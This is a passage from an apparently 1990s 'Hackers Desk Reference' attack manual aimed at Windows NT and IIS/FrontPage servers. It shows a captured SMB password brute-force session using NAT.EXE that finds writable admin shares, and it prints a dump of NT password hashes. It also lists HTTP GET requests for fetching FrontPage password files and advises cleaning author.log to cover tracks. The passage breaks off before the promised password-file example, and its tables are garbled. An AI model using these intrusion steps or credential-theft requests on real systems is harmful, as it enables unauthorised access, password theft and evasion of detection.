Hackers Desk Reference
.pdfC:\net use /?
The syntax of this command is:
NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username] [[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
C:\net use x: \\XXX.XX.XXX.XX\test |
|
|
The command completed successfully. |
|
|
C:\unzipped\nat10bin>net use |
|
|
New connections will be remembered. |
|
|
Status |
Local Remote |
Network |
-------------------------------------------------------------------------------
OK |
X: |
\\XXX.XX.XXX.XX\test |
Microsoft Windows Network |
OK |
|
\\XXX.XX.XXX.XX\test |
Microsoft Windows Network |
The command completed successfully.
Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.
C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX [*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: * [*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename |
Type |
Comment |
|
--------- |
---- |
------- |
|
ADMIN$ |
|
Disk: |
Remote Admin |
C$ |
Disk: Default share |
IPC$ |
IPC: |
Remote IPC |
NETLOGON |
Disk: Logon server share |
|
Test |
Disk: |
|
[*]--- This machine has a browse list:
Server |
Comment |
--------- |
------- |
STUDENT1 |
|
[*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$ [*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$ [*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON [*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test [*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access
If the default share of Everyone/Full Control is active, then you are done, the server is
hacked. If not, keep playing. You will be surprised what you find out.
[9.0.0] Frontpage Extension Attacks
Ofcourse, everyone should know what Microsoft Frontpage is. The server extensions are installed server side to provide added functionality for frontpage web authors. These extensions function as "web bots" if you will, giving web authors that use frontpage easy access to complex web and HTML functions. Soon after the extensions came into wide use, security concerns began to pop-up. Most of these security concerns were very basic, the collection presented below are PROVEN methods that have been tested repeatedly in several types of configurations.
[9.0.1] For the tech geeks, we give you an actual PWDUMP
This is the pwdump from the webserver the Lan Manager password is set to "password". This PWDUMP example is for those of you that have heard about the utility but may have never actually seen the output of one. This dump was used by Vacuum of rhino9 during his journey into cracking the NT encryption algorithm.
Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117A D06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378 EFEE40503127253:::
ketan:1005:********************************:******************************
**:::
mari:1006:********************************:******************************
**:::
meng:1007:********************************:*****************************
***:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390
AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::
[9.0.2] The haccess.ctl file
The hacces.ctl file is sometimes called a shadow password file, well, this is not exactly correct. The file can give you a lot of information, including the location of the service password file. A complete example of the haccess.ctl file is given below:
The #haccess.ctl file:
# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
Executing fpservwin.exe allows frontpage server extensions to be installed on
port 443 (HTTPS)Secure Sockets Layer
port 80 (HTTP)
NOTE: The Limit line. Telneting to port 80 or 443 and using GET, POST, and PUT can be used
instead of Frontpage.
The following is a list of the Internet Information server files location
in relation to the local hard drive (C:) and the web (www.target.com)
C:\InetPub\wwwroot |
<Home> |
C:\InetPub\scripts |
/Scripts |
C:\InetPub\wwwroot\_vti_bin |
/_vti_bin |
C:\InetPub\wwwroot\_vti_bin\_vti_adm |
/_vti_bin/_vti_adm |
C:\InetPub\wwwroot\_vti_bin\_vti_aut |
/_vti_bin/_vti_aut |
C:\InetPub\cgi-bin |
/cgi-bin |
C:\InetPub\wwwroot\srchadm |
/srchadm |
C:\WINNT\System32\inetserv\iisadmin |
/iisadmin |
C:\InetPub\wwwroot\_vti_pvt |
|
FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to:
service.pwd contains the list of users and passwords for the FrontPage web.
service.grp contains the list of groups (one group for authors and one for administrators in FrontPage).
On Netscape servers, there are no service.grp files. The Netscape password files are:
administrators.pwd for administrators
authors.pwd for authors and administrators
users.pwd for users, authors, and administrators
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample
If Index Information Server is running under Internet Information Server:
service.pwd (or any other file) can sometimes be retrieved.
search for
"#filename=*.pwd"
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin
C:\InetPub\ftproot |
The default location for the |
ftp |
|
The ftp service by default runs on the standard port 21.
Check to see if anonymous connections are allowed. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within Windows NT ; anonymous users do not log on
using this user name and password.
Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions. When installed, Internet Information Server's Setup created the account IUSR_computername in the Windows NT User Manager for Domains and in Internet Service Manager. This account was assigned a random password for both in Internet Service Manager and in the Windows NT User Manager for Domains. If changed, the password, you must change it in both places and make sure it matches.
NOTE: Name and password are case sensitive
Scanning PORT 80 (http) or 443 (https) options:
GET /__vti_inf.html |
#Ensures that frontpage server extensions |
|
are installed. |
GET /_vti_pvt/service.pwd |
#Contains the encrypted password files. |
|
Not used on IIS and WebSite servers |
GET /_vti_pvt/authors.pwd |
#On Netscape servers only. Encrypted |
|
names and passwords of authors. |
GET /_vti_pvt/administrators.pwd |
|
GET /_vti_log/author.log |
#If author.log is there it will need to |
|
be cleaned to cover your tracks |
GET /samples/search/queryhit.htm
If service.pwd is obtained it will look similar to this: